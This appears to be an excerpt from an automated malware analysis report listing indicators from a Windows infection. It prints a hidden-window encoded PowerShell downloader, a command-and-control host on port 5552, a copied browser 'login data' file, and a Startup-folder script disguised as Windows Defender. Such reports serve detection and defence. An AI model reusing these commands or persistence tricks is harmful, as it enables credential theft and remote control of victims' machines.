Technical Information
- $asxzdbjdfdfdf.replace(}}}} as /
- %WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe
- %TEMP%\login data
- %TEMP%\2076956
- %TEMP%\login data
- %TEMP%\2076956
- 'xo###.ddns.net':5552
- DNS ASK xo###.ddns.net
- '%WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe' -f "%TEMP%\2076956"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc JABBAFMAWABaAGQAYgBqAGQAZgBkAGYAZABmACAAPQAgAEAAJwANAAoAaABeAF4AXgBeAHAAOgB9AH0AfQB9AH0AfQB9AH0AdwB3AHcALgA0AHUAcAA0AC4AYwBvAG0AfQB9AH0AfQB1AHAAbABvAGEAZABzAH0AfQB9AH0AZgBpAGwAZQBf...' (with hidden window)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\vbc.exe' -f "%TEMP%\2076956"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\windows defender.vbs"